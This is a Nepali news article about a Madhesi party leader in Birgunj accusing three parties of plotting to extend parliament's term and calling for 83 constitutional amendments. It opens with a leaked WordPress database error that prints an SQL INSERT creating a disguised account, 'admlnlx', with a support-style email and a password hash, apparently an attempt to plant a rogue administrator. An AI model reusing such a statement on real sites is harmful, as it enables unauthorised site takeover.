WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEdafZ.kIWD3cwK7tqn.PVffOOnFvN1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:15:20', '', 'admlnlx', 'admlnlx')
पर्सा,मंसिर १६-
तराई मधेस लोकतान्त्रिक पार्टीका सहअध्यक्ष हृदयेश त्रिपाठीले व्यवस्थापिका–संसद्को एक वर्ष म्याद थप्ने षड्यन्त्रमा तीन दल लागेको आरोप लगाएका छन् ।
सो पार्टी पर्साले आज वीरगन्जमा आयोजना गरेको पत्रकार सम्मेलनमा उनले मुलुकमा असहज परिस्थिति सिर्जना गरी वा गराई निर्वाचनलाई पछि सार्दै संसद्को एक वर्ष म्याद थप्ने विषयमा शीर्ष तीन दलका नेताबीच सहमति भइसकेको आरोप लगाए ।
नेता त्रिपाठीले सरकारले ल्याएको चार बुँदे संशोधन प्रस्तावलाई परिमार्जित गर्न आवश्यक रहेको बताउँदै सरकारले संसद्मा दर्ता गरेको संशोधन प्रस्ताव विगतमा काँग्रेस र एमालेले नै तयार पारेको प्रस्ताव रहेको दाबी गरे ।
आफैँले तयार पारेको प्रस्तावलाई एमालेका नेताहरुले राष्ट्रघाती देख्नु मधेसवादी दललाई आश्चर्यमा पारेको बताउँदै उनले भने, ‘वर्तमान संविधानलाई टेकी निर्वाचन आयोगले चुनाव गराउन सकिदैन ।’
नेता त्रिपाठीले निर्वाचन आयोगका अधिकारीले संविधानमा कानुनी जटिलता रहेकाले वर्तमान अवस्थामा निर्वाचन गराउन नसकिने सार्वजनिक रुपमै अभिव्यक्ति व्यक्त गरेकाले निर्वाचन हुने सम्भावना न्यून रहेको धारणा व्यक्त गरे ।
एक प्रश्नको जवाफमा उनले वर्तमान संविधानको ८३ वटा धारामा संशोधनको आवश्यक्ता रहेको बताउँदै ती ८३ वटै धारालाई संशोधन गरेपछि मात्र संविधान सर्वस्वीकार्य बनाउन सकिने बताए ।